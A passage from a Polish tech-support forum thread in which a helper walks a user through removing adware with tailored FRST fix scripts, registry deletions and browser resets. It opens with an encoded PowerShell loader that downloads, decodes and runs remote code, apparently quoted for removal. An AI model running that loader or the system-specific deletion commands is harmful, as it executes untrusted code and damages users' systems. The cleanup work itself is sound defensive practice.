QAcwB0AHMAawA9ACIAewAwAEYANwBGADcAOQA0ADcALQAwADUAMABBAC0ANwA5ADcARQAtADcAQQAxADEALQA3AEEAMAA5ADAARgA3ADkAMQAxADcAQQB9ACIAOwAkAHAAcgBpAGQAPQAiAFMAeQBzAHQAZQBtAEgAZQBhAGwAZQByACIAOwAkAGkAbgBpAGQAPQAiAFEAMwA0AFYAMwBVAFUAUQAiADsAdAByAHkAewBpAGYAKAAkAFAAUwBWAGUAcgBzAGkAbwBuAFQAYQBiAGwAZQAuAFAAUwBWAGUAcgBzAGkAbwBuAC4ATQBhAGoAbwByACAALQBsAHQAIAAyACkAewBiAHIAZQBhAGsAOwB9ACQAdgA9AFsAUwB5AHMAdABlAG0ALgBFAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoATwBTAFYAZQByAHMAaQBvAG4ALgBWAGUAcgBzAGkAbwBuADsACgBpAGYAKAAkAHYALgBNAGEAagBvAHIAIAAtAGUAcQAgADUAKQB7AGkAZgAoACgAJAB2AC4ATQBpAG4AbwByACAALQBsAHQAIAAyACkAIAAtAEEATgBEACAAKAAoAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABXAGkAbgAzADIAXwBPAHAAZQByAGEAdABpAG4AZwBTAHkAcwB0AGUAbQApAC4AUwBlAHIAdgBpAGMAZQBQAGEAYwBrAE0AYQBqAG8AcgBWAGUAcgBzAGkAbwBuACAALQBsAHQAIAAyACkAKQB7AGIAcgBlAGEAawA7AH0AfQAKAGkAZgAoAC0ATgBPAFQAIAAoAFsAUwBlAGMAdQByAGkAdAB5AC4AUAByAGkAbgBjAGkAcABhAGwALgBXAGkAbgBkAG8AdwBzAFAAcgBpAG4AYwBpAHAAYQBsAF0AWwBTAGUAYwB1AHIAaQB0AHkALgBQAHIAaQBuAGMAaQBwAGEAbAAuAFcAaQBuAGQAbwB3AHMASQBkAGUAbgB0AGkAdAB5AF0AOgA6AEcAZQB0AEMAdQByAHIAZQBuAHQAKAApACkALgBJAHMASQBuAFIAbwBsAGUAKABbAFMAZQBjAHUAcgBpAHQAeQAuAFAAcgBpAG4AYwBpAHAAYQBsAC4AVwBpAG4AZABvAHcAcwBCAHUAaQBsAHQASQBuAFIAbwBsAGUAXQAgACIAQQBkAG0AaQBuAGkAcwB0AHIAYQB0AG8AcgAiACkAKQB7AGIAcgBlAGEAawA7AH0ACgBmAHUAbgBjAHQAaQBvAG4AIAB3AGMAKAAkAHUAcgBsACkAewAkAHIAcQA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAHIAcQAuAFUAcwBlAEQAZQBmAGEAdQBsAHQAQwByAGUAZABlAG4AdABpAGEAbABzAD0AJAB0AHIAdQBlADsAJAByAHEALgBIAGUAYQBkAGUAcgBzAC4AQQBkAGQAKAAiAHUAcwBlAHIALQBhAGcAZQBuAHQAIgAsACIATQBvAHoAaQBsAGwAYQAvADQALgAwACAAKABjAG8AbQBwAGEAdABpAGIAbABlADsAIABNAFMASQBFACAANwAuADAAOwAgAFcAaQBuAGQAbwB3AHMAIABOAFQAIAA2AC4AMQA7ACkAIgApADsAcgBlAHQAdQByAG4AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAcgBxAC4ARABvAHcAbgBsAG8AYQBkAEQAYQB0AGEAKAAkAHUAcgBsACkAKQA7AH0ACgBmAHUAbgBjAHQAaQBvAG4AIABkAHMAdAByACgAJAByAGEAdwBkAGEAdABhACkAewAkAGIAdAA9AFsAQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJAByAGEAdwBkAGEAdABhACkAOwAkAGUAeAB0AD0AJABiAHQAWwAwAF0AOwAkAGsAZQB5AD0AJABiAHQAWwAxAF0AIAAtAGIAeABvAHIAIAAxADcAMAA7AGYAbwByACgAJABpAD0AMgA7ACQAaQAgAC0AbAB0ACAAJABiAHQALgBMAGUAbgBnAHQAaAA7ACQAaQArACsAKQB7ACQAYgB0AFsAJABpAF0APQAoACQAYgB0AFsAJABpAF0AIAAtAGIAeABvAHIAIAAoACgAJABrAGUAeQAgACsAIAAkAGkAKQAgAC0AYgBhAG4AZAAgADIANQA1ACkAKQA7AH0ACgByAGUAdAB1AHIAbgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBEAGUAZgBsAGEAdABlAFMAdAByAGUAYQBtACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AKAAkAGIAdAAsADIALAAoACQAYgB0AC4ATABlAG4AZwB0AGgALQAkAGUAeAB0ACkAKQApACwAWwBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ATQBvAGQAZQBdADoAOgBEAGUAYwBvAG0AcAByAGUAcwBzACkAKQApAC4AUgBlAGEAZABUAG8ARQBuAGQAKAApADsAfQAKACQAcwBjAD0AZABzAHQAcgAoAHcAYwAoACQAcwB1AHIAbAApACkAOwBJAG4AdgBvAGsAZQAtAEUAeABwAHIAZQBzAHMAaQBvAG4AIAAtAGMAbwBtAG0AYQBuAGQAIAAiACQAcwBjACIAOwB9AGMAYQB0AGMAaAB7AH0AOwBlAHgAaQB0ACAAMAA7AA== Task: {BEE6820B-A5D5-45E6-AB6A-D5A4331B3475} - System32\Tasks\{B399420A-560F-4B7C-B3BD-F85BA49AEDAE} => Firefox.exe hxxp://ui.skype.com/ui/0/6.3.73.105.456/pl/abandoninstall?page=tsProgressBar Task: {C1C71FE9-F10E-4D9C-A5B7-ED922E21FB3A} - System32\Tasks\{9CFB0D6C-72B7-4916-92F8-2A43298E80F1} => pcalua.exe -a E:\DATA\Install.exe -d E:\DATA Task: {D7C0029C-1B7F-40A9-827E-8E6A1A46B1DC} - System32\Tasks\Price Fountain => C:\Users\Admin\AppData\Roaming\PRICEF~1\UPDATE~1\UPDATE~1.EXE Task: {F988A5E4-06EB-44F6-94CB-F946CD5678B8} - System32\Tasks\{E993273D-4EFE-4CEA-BCED-7F3E95AB859E} => Firefox.exe hxxp://ui.skype.com/ui/0/6.6.0.106/pl/abandoninstall?page=tsMain Task: C:\Windows\Tasks\Price Fountain.job => C:\Users\Admin\AppData\Roaming\PRICEF~1\UPDATE~1\UPDATE~1.EXE DeleteKey: HKCU\Software\1Q1F1S1C1P1E1C1F1N1C1T1H2UtF1E1I DeleteKey: HKCU\Software\dobreprogramy DeleteKey: HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\PriceFountain DeleteKey: HKCU\Software\Mozilla DeleteKey: HKLM\SOFTWARE\Mozilla DeleteKey: HKLM\SOFTWARE\MozillaPlugins DeleteKey: HKLM\SOFTWARE\Wow6432Node\Mozilla DeleteKey: HKLM\SOFTWARE\Wow6432Node\mozilla.org DeleteKey: HKLM\SOFTWARE\Wow6432Node\MozillaPlugins DeleteKey: HKLM\SOFTWARE\Wow6432Node\yoursites123Software DeleteKey: HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\yoursearching uninstall RemoveDirectory: C:\Program Files (x86)\Free PDF to Word Doc Converter RemoveDirectory: C:\Program Files (x86)\WinZipper RemoveDirectory: C:\ProgramData\e9d408a6-1113-1 RemoveDirectory: C:\ProgramData\e9d408a6-4d47-0 RemoveDirectory: C:\ProgramData\e9d408a6-53b1-0 RemoveDirectory: C:\ProgramData\e9d408a6-6ea5-1 RemoveDirectory: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Ares RemoveDirectory: C:\Users\Admin\AppData\Local\Gameo RemoveDirectory: C:\Users\Admin\AppData\Local\Mozilla RemoveDirectory: C:\Users\Admin\AppData\Local\ShipkeeperXenoliths RemoveDirectory: C:\Users\Admin\AppData\Roaming\Gameo RemoveDirectory: C:\Users\Admin\AppData\Roaming\GoldenGate RemoveDirectory: C:\Users\Admin\AppData\Roaming\Mozilla RemoveDirectory: C:\Users\Admin\AppData\Roaming\PriceFountain RemoveDirectory: C:\Users\Admin\AppData\Roaming\TSv RemoveDirectory: C:\Users\Admin\AppData\Roaming\WinZipper C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware\Tools\Malwarebytes Anti-Malware Chameleon.lnk C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\Ares.lnk C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Play Games Online.url C:\Users\Admin\Desktop\Continue WinRAR installation.lnk C:\Users\Admin\Desktop\sh-remover.exe C:\Windows\SysWOW64\pl.html CMD: netsh advfirewall reset EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt i umieść obok narzędzia FRST. Uruchom FRST i kliknij w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, system zostanie zresetowany. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 2. Napraw uszkodzony specjalny skrót IE. W pasku eksploratora wklej poniższą ścieżkę i ENTER: C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools Prawoklik na zlokalizowany tam skrót Internet explorer (bez dodatków) > Właściwości > w polu Element docelowy po ścieżce "C:\Program Files\Internet Explorer (x86)\iexplore.exe" dopisz dwie spacje i -extoff 3. Zrób nowy log FRST z opcji Skanuj (Scan), ponownie z Addition, ale już bez Shortcut. Dołącz też plik fixlog.txt.

Zadania wykonane. Z tego co rozumiem widzisz nadal reklamy - jaki rodzaj i na jakich stronach? Zaprezentuj zrzut ekranu.

Ten ostatni skrypt był uruchamiany dwa razy, dlatego FRST nic już nie znalazł. W ostatnich logach rozszerzenia RealPlayer nie było już w Chrome, ale ten wpis RealUpgrade 1.1 tak. W związku z tym: 1. Uruchom Zoek. W oknie wklej: RealUpgrade 1.1;u Klik w Run Script. Przedstaw wynikowy log zoek-results.txt (po zmianie nazwy rozszerzenia z *.log). 2. Upłynęło sporo czasu. Na wszelki wypadek zrób nowe logi FRST (z zaznaczonym polem Addition).

Nie zapisałeś pliku Fixlist.txt w UTF-8 jak instruowałam, a poznać to można po tym, że cyrylica w jednym wpisie została przerobiona na pytajniki. Wpis został przetworzony tylko przypadkowo, gdyż FRST zinterpretował pytajniki jako znaki wieloznaczne... A dostarczony log Addition.txt jest stary z poprzedniego uruchomienia, usuwam. Poproszę o wygenerowanie nowego pliku.

Brakuje głównego raportu FRST.txt. Dołącz. PS. Wykonanie wcześniej skryptu z innego forum nic nie wniosło do sprawy, tzn. brak uszkodzeń czy wykonanej naprawy. On prawie nic nie wykonał, gdyż w skrypcie są konkretne ścieżki dostępu nieobecne oczywiście u Ciebie.

Stosowałeś ComboFix i na ten temat: KLIK. Obecnie to nie jest nawet dobry program do czyszczenia adware. I to prawdopodobnie ComboFix uszkodził poniższą instalację usuwając plik deinstalacyjny, a nie widzę na dysku Qoobox z kwarantanną, by dało się plik odzyskać: Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Hager Tehalit\Semiolog\Odinstaluj.lnk -> C:\Windows\IsUn0415.exe (Brak pliku) Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Hager Tehalit\Elektroniczny Magnetplaner\Odinstaluj.lnk -> C:\Windows\IsUn0415.exe (Brak pliku) Jeśli chodzi o problem reklam w Google Chrome, jedyne co tu budzi podejrzenia to rozszerzenie Video AdBlock for Chrome - zainstalowane "nienormalną" metodą na poziomie rejestru, co wskazuje, że wprowadzał je zewnętrzny instalator i nie była to instalacja z Chrome Web Store. Wstępnie: 1. W Google Chrome: Zresetuj synchronizację (o ile włączona): Otwórz Panel Google. Na dole kliknij Resetuj synchronizację. Ustawienia > karta Rozszerzenia > odinstaluj Video AdBlock for Chrome. Ustawienia > karta Ustawienia > Pokaż ustawienia zaawansowane > zjedź na sam spód i uruchom opcję Resetowanie ustawień. Zakładki i hasła nie zostaną naruszone. 2. Otwórz Notatnik i wklej w nim: CloseProcesses: CreateRestorePoint: Task: {0EE16BFD-BA97-48AD-A384-B71CA1837667} - System32\Tasks\{9A533925-0E09-491C-A980-271CE4EA6998} => pcalua.exe -a C:\Users\Adam\Downloads\VGA_nVidia_NB9X_Vista64_Win7_64_816118757\setup.exe -d C:\Users\Adam\Downloads\VGA_nVidia_NB9X_Vista64_Win7_64_816118757 U5 AppMgmt; C:\Windows\system32\svchost.exe [27136 2009-07-14] (Microsoft Corporation) S3 Tosrfcom; Brak ImagePath S3 catchme; \??\C:\ComboFix\catchme.sys [X] HKU\S-1-5-21-2241876270-1104089119-2635419705-1001\...\Policies\Explorer: [] CHR HKU\S-1-5-21-2241876270-1104089119-2635419705-1001\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [bknbnapaddjdnbilpmlacdkjdkjmbjhd] - hxxp://clients2.google.com/service/update2/crx CHR HKLM-x32\...\Chrome\Extension: [bknbnapaddjdnbilpmlacdkjdkjmbjhd] - hxxp://clients2.google.com/service/update2/crx HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Ograniczenia <======= UWAGA HKU\S-1-5-21-2241876270-1104089119-2635419705-1001\SOFTWARE\Policies\Microsoft\Internet Explorer: Ograniczenia <======= UWAGA HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = about:blank HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = HKU\S-1-5-21-2241876270-1104089119-2635419705-1001\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch DeleteKey: HKU\S-1-5-18\Software\Microsoft\Internet Explorer\Main DeleteKey: HKU\S-1-5-19\Software\Microsoft\Internet Explorer\Main DeleteKey: HKU\S-1-5-20\Software\Microsoft\Internet Explorer\Main RemoveDirectory: C:\ProgramData\bdch EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt i umieść obok narzędzia FRST. Uruchom FRST i kliknij w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, system zostanie zresetowany. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 3. Zrób nowy log FRST z opcji Skanuj (Scan), już bez Addition i Shortcut. Dołącz też plik fixlog.txt. Wypowiedz się czy problem reklam nadal występuje.

Tak, na pewno problemem było przeklejanie z poziomu tabletu. Ostatnie akcje pomyślnie wykonane. Na koniec: 1. Był uruchamiany GMER, toteż upewnij się, że nie wystąpiły skutki uboczne (o ile już tego nie korygowałeś): KLIK. 2. Zastosuj DelFix oraz wyczyść foldery Przywracania systemu: KLIK.

Niezbyt dużo tu widać, po prostu adware (BingSvc w starcie oraz inne w Firefox i Internet Explorer), żadnych oznak innego typu malware, więc nie widzę potrzeby wymiany haseł. Czyli: 1. Odinstaluj: Codecs for Windows 7 Pack 4.0.5 (uszkodzony, AdwCleaner wykrywa powiązane z nim komponenty), Google Chrome (strasznie stara wersja!), Java 7 Update 45 (wiadomo). Jeśli chodzi o programy integrowane z ASUS i inne dodatkowe, to można byłoby się pozbyć tego wszystkiego (wykluczając te z których użytkownik korzysta): ASUS FancyStart (HKLM-x32\...\{2B81872B-A054-48DA-BE3B-FA5C164C303A}) (Version: 1.0.8 - ASUSTeK Computer Inc.) ----> wymiana grafiki ekranu bootowania ASUS LifeFrame3 (HKLM-x32\...\{1DBD1F12-ED93-49C0-A7CC-56CBDE488158}) (Version: 3.1.7 - ASUS) ----> zrzuter ekranu / edytor powiązany z kamerą ASUS Live Update (HKLM-x32\...\{FA540E67-095C-4A1B-97BA-4D547DEC9AF4}) (Version: 3.0.6 - ASUS) ----> autoaktualizacja sterowników i BIOS ASUS Power4Gear Hybrid (HKLM\...\{9B6239BF-4E85-4590-8D72-51E30DB1A9AA}) (Version: 1.1.43 - ASUS) ----> tweaker zasilania ASUS SmartLogon (HKLM-x32\...\{64452561-169F-4A36-A2FF-B5E118EC65F5}) (Version: 1.0.0008 - ASUS) ----> logowanie za pomocą rozpoznawania twarzy ASUS Splendid Video Enhancement Technology (HKLM-x32\...\{0969AF05-4FF6-4C00-9406-43599238DE0D}) (Version: 1.02.0030 - ASUS) ----> "polepszanie jakości" ekranu CyberLink LabelPrint (HKLM-x32\...\InstallShield_{C59C179C-668D-49A9-B6EA-0121CCFC1243}) (Version: 2.5.1908 - CyberLink Corp.) CyberLink Power2Go (HKLM-x32\...\InstallShield_{40BF1E83-20EB-11D8-97C5-0009C5020658}) (Version: 6.1.3602c - CyberLink Corp.) Fast Boot (HKLM\...\{13F4A7F3-EABC-4261-AF6B-1317777F0755}) (Version: 1.0.8 - ASUS) ----> menedżer startu Nuance PDF Reader (HKLM-x32\...\{B480904D-F73F-4673-B034-8A5F492C9184}) (Version: 6.00.0041 - Nuance Communications, Inc.) NVIDIA GeForce Experience 2.1.2 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.GFExperience) (Version: 2.1.2 - NVIDIA Corporation) syncables desktop SE (HKLM-x32\...\{341697D8-9923-445E-B42A-529E5A99CB7A}) (Version: 5.5.746.11492 - syncables) ----> synchronizacja między urządzeniami Windows Live Essentials (HKLM-x32\...\WinLiveSuite) (Version: 15.4.3502.0922 - Microsoft Corporation) 2. Otwórz Notatnik i wklej w nim: CloseProcesses: CreateRestorePoint: HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.mystartsearch.com/?type=hp&ts=1418929443&from=epom&uid=WDCXWD6400BPVT-80HXZT1_WD-WXG1EB0MDC66MDC66 HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.mystartsearch.com/?type=hp&ts=1418929443&from=epom&uid=WDCXWD6400BPVT-80HXZT1_WD-WXG1EB0MDC66MDC66 HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.mystartsearch.com/web/?type=ds&ts=1418929443&from=epom&uid=WDCXWD6400BPVT-80HXZT1_WD-WXG1EB0MDC66MDC66&q={searchTerms} HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.mystartsearch.com/web/?type=ds&ts=1418929443&from=epom&uid=WDCXWD6400BPVT-80HXZT1_WD-WXG1EB0MDC66MDC66&q={searchTerms} HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.mystartsearch.com/?type=hp&ts=1418929443&from=epom&uid=WDCXWD6400BPVT-80HXZT1_WD-WXG1EB0MDC66MDC66 HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.mystartsearch.com/?type=hp&ts=1418929443&from=epom&uid=WDCXWD6400BPVT-80HXZT1_WD-WXG1EB0MDC66MDC66 HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.mystartsearch.com/web/?type=ds&ts=1418929443&from=epom&uid=WDCXWD6400BPVT-80HXZT1_WD-WXG1EB0MDC66MDC66&q={searchTerms} HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.mystartsearch.com/web/?type=ds&ts=1418929443&from=epom&uid=WDCXWD6400BPVT-80HXZT1_WD-WXG1EB0MDC66MDC66&q={searchTerms} HKU\S-1-5-21-729949790-563291647-4237402503-1002\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.msn.com/?pc=SL5M&ocid=SL5MDHP&osmkt=pl-pl HKU\S-1-5-21-729949790-563291647-4237402503-1002\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.mystartsearch.com/?type=hp&ts=1418929443&from=epom&uid=WDCXWD6400BPVT-80HXZT1_WD-WXG1EB0MDC66MDC66 SearchScopes: HKLM -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.mystartsearch.com/web/?type=ds&ts=1418929443&from=epom&uid=WDCXWD6400BPVT-80HXZT1_WD-WXG1EB0MDC66MDC66&q={searchTerms} SearchScopes: HKLM -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.mystartsearch.com/web/?type=ds&ts=1418929443&from=epom&uid=WDCXWD6400BPVT-80HXZT1_WD-WXG1EB0MDC66MDC66&q={searchTerms} SearchScopes: HKLM-x32 -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.mystartsearch.com/web/?type=ds&ts=1418929443&from=epom&uid=WDCXWD6400BPVT-80HXZT1_WD-WXG1EB0MDC66MDC66&q={searchTerms} SearchScopes: HKLM-x32 -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.mystartsearch.com/web/?type=ds&ts=1418929443&from=epom&uid=WDCXWD6400BPVT-80HXZT1_WD-WXG1EB0MDC66MDC66&q={searchTerms} SearchScopes: HKU\S-1-5-21-729949790-563291647-4237402503-1002 -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.mystartsearch.com/web/?type=ds&ts=1418929443&from=epom&uid=WDCXWD6400BPVT-80HXZT1_WD-WXG1EB0MDC66MDC66&q={searchTerms} SearchScopes: HKU\S-1-5-21-729949790-563291647-4237402503-1002 -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.mystartsearch.com/web/?type=ds&ts=1418929443&from=epom&uid=WDCXWD6400BPVT-80HXZT1_WD-WXG1EB0MDC66MDC66&q={searchTerms} SearchScopes: HKU\S-1-5-21-729949790-563291647-4237402503-1002 -> {6A1806CD-94D4-4689-BA73-E35EA1EA9990} URL = BHO: Partner BHO Class -> {83FF80F4-8C74-4b80-B5BA-C8DDD434E5C4} -> C:\ProgramData\Partner\Partner64.dll [2011-03-01] (Google Inc.) BHO-x32: Partner BHO Class -> {83FF80F4-8C74-4b80-B5BA-C8DDD434E5C4} -> C:\ProgramData\Partner\Partner.dll [2011-03-01] (Google Inc.) BHO-x32: PriceFountain -> {b608cc98-54de-4775-96c9-097de398500c} -> C:\Users\Ania\AppData\Local\PriceFountain\PriceFountainIE.dll [2015-01-11] () StartMenuInternet: IEXPLORE.EXE - C:\Program Files\Internet Explorer\iexplore.exe hxxp://www.mystartsearch.com/?type=sc&ts=1418929443&from=epom&uid=WDCXWD6400BPVT-80HXZT1_WD-WXG1EB0MDC66MDC66 FF HKLM-x32\...\Firefox\Extensions: [faststartff@gmail.com] - C:\Users\Ania\AppData\Roaming\Mozilla\Firefox\Profiles\nbsr4833.default\extensions\faststartff@gmail.com FF Plugin-x32: @pandonetworks.com/PandoWebPlugin -> C:\Program Files (x86)\Pando Networks\Media Booster\npPandoWebPlugin.dll [Brak pliku] FF Plugin HKU\S-1-5-21-729949790-563291647-4237402503-1002: ubisoft.com/uplaypc -> C:\Program Files (x86)\Ubisoft\Ubisoft Game Launcher\npuplaypc.dll [Brak pliku] HKLM\...\Run: [ASUS WebStorage] => C:\Program Files (x86)\ASUS\ASUS WebStorage\SERVICE\AsusWSService.exe HKU\S-1-5-21-729949790-563291647-4237402503-1002\...\Run: [Akamai NetSession Interface] => "C:\Users\Ania\AppData\Local\Akamai\netsession_win.exe" HKU\S-1-5-21-729949790-563291647-4237402503-1002\...\Run: [BingSvc] => C:\Users\Ania\AppData\Local\Microsoft\BingSvc\BingSvc.exe [144008 2015-11-12] (© 2015 Microsoft Corporation) HKU\S-1-5-21-729949790-563291647-4237402503-1002\Control Panel\Desktop\\SCRNSAVE.EXE -> HKU\S-1-5-18\Control Panel\Desktop\\SCRNSAVE.EXE -> HKU\S-1-5-19\Control Panel\Desktop\\SCRNSAVE.EXE -> HKU\S-1-5-20\Control Panel\Desktop\\SCRNSAVE.EXE -> DeleteKey: HKCU\Software\1Q1F1S1C1P1E1C1F1N1C1T1H2UtF1E1I DeleteKey: HKCU\Software\BonanzaDealsLive DeleteKey: HKCU\Software\BrowseMark DeleteKey: HKCU\Software\dobreprogramy DeleteKey: HKCU\Software\ForumerIT DeleteKey: HKCU\Software\Google DeleteKey: HKCU\Software\InstallCore DeleteKey: HKCU\Software\MaxiGet DeleteKey: HKCU\Software\Mozilla\Extends DeleteKey: HKCU\Software\PriceFountain DeleteKey: HKCU\Software\SupHpUISoft DeleteKey: HKCU\Software\UpdateStar DeleteKey: HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\mountpoints2 DeleteKey: HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{83FF80F4-8C74-4B80-B5BA-C8DDD434E5C4} DeleteKey: HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{B608CC98-54DE-4775-96C9-097DE398500C} DeleteKey: HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{83FF80F4-8C74-4B80-B5BA-C8DDD434E5C4} DeleteKey: HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{B608CC98-54DE-4775-96C9-097DE398500C} DeleteKey: HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\DirectX Packages DeleteKey: HKLM\SOFTWARE\Google DeleteKey: HKLM\SOFTWARE\V9Software DeleteKey: HKLM\SOFTWARE\Classes\CLSID\{83FF80F4-8C74-4B80-B5BA-C8DDD434E5C4} DeleteKey: HKLM\SOFTWARE\Classes\Interface\{03E2A1F3-4402-4121-8B35-733216D61217} DeleteKey: HKLM\SOFTWARE\Classes\Interface\{4E6354DE-9115-4AEE-BD21-C46C3E8A49DB} DeleteKey: HKLM\SOFTWARE\Classes\Interface\{4E92DB5F-AAD9-49D3-8EAB-B40CBE5B1FF7} DeleteKey: HKLM\SOFTWARE\Classes\Interface\{9E3B11F6-4179-4603-A71B-A55F4BCB0BEC} DeleteKey: HKLM\SOFTWARE\Classes\Interface\{C401D2CE-DC27-45C7-BC0C-8E6EA7F085D6} DeleteKey: HKLM\SOFTWARE\Classes\Interface\{D0EC4142-5808-41D2-A4DC-6081CF1A9693} DeleteKey: HKLM\SOFTWARE\Classes\Interface\{FC073BDA-C115-4A1D-9DF9-9B5C461482E5} DeleteKey: HKLM\SOFTWARE\Wow6432Node\BrowseMark DeleteKey: HKLM\SOFTWARE\Wow6432Node\Google DeleteKey: HKLM\SOFTWARE\Wow6432Node\mystartsearchSoftware DeleteKey: HKLM\SOFTWARE\Wow6432Node\PriceMeterLiveUpdate DeleteKey: HKLM\SOFTWARE\Wow6432Node\SupDp DeleteKey: HKLM\SOFTWARE\Wow6432Node\V9Software DeleteKey: HKLM\SOFTWARE\Wow6432Node\Classes\AppID\kt_bho_dll.dll DeleteKey: HKLM\SOFTWARE\Wow6432Node\Classes\AppID\{28A88B70-D874-4F73-BBBA-9B2B222FB7D6} DeleteKey: HKLM\SOFTWARE\Wow6432Node\Classes\CLSID\{1AA60054-57D9-4F99-9A55-D0FBFBE7ECD3} DeleteKey: HKLM\SOFTWARE\Wow6432Node\Classes\CLSID\{5A4E3A41-FA55-4BDA-AED7-CEBE6E7BCB52} DeleteKey: HKLM\SOFTWARE\Wow6432Node\Classes\CLSID\{83FF80F4-8C74-4B80-B5BA-C8DDD434E5C4} DeleteKey: HKLM\SOFTWARE\Wow6432Node\Classes\CLSID\{DE9028D0-5FFA-4E69-94E3-89EE8741F468} DeleteKey: HKLM\SOFTWARE\Wow6432Node\Classes\CLSID\{E7DF6BFF-55A5-4EB7-A673-4ED3E9456D39} DeleteKey: HKLM\SOFTWARE\Wow6432Node\Classes\CLSID\{459DD0F7-0D55-D3DC-67BC-E6BE37E9D762} DeleteKey: HKLM\SOFTWARE\Wow6432Node\Classes\CLSID\{B608CC98-54DE-4775-96C9-097DE398500C} DeleteKey: HKLM\SOFTWARE\Wow6432Node\Classes\Interface\{03E2A1F3-4402-4121-8B35-733216D61217} DeleteKey: HKLM\SOFTWARE\Wow6432Node\Classes\Interface\{4E6354DE-9115-4AEE-BD21-C46C3E8A49DB} DeleteKey: HKLM\SOFTWARE\Wow6432Node\Classes\Interface\{9E3B11F6-4179-4603-A71B-A55F4BCB0BEC} DeleteKey: HKLM\SOFTWARE\Wow6432Node\Classes\Interface\{D0EC4142-5808-41D2-A4DC-6081CF1A9693} DeleteKey: HKLM\SOFTWARE\Wow6432Node\Classes\Interface\{FC073BDA-C115-4A1D-9DF9-9B5C461482E5} DeleteKey: HKLM\SOFTWARE\Wow6432Node\Classes\TypeLib\{396ECD31-EDF7-489F-BDA1-83DBA4C36E81} DeleteKey: HKLM\SOFTWARE\Wow6432Node\Classes\TypeLib\{86676E13-D6D8-4652-9FCF-F2047F1FB000} DeleteKey: HKLM\SOFTWARE\Wow6432Node\Classes\TypeLib\{9C049BA6-EA47-4AC3-AED6-A66D8DC9E1D8} DeleteKey: HKLM\SOFTWARE\Wow6432Node\Classes\TypeLib\{A2D733A7-73B0-4C6B-B0C7-06A432950B66} DeleteKey: HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\App Paths\MobogenieAdd deleteKey: 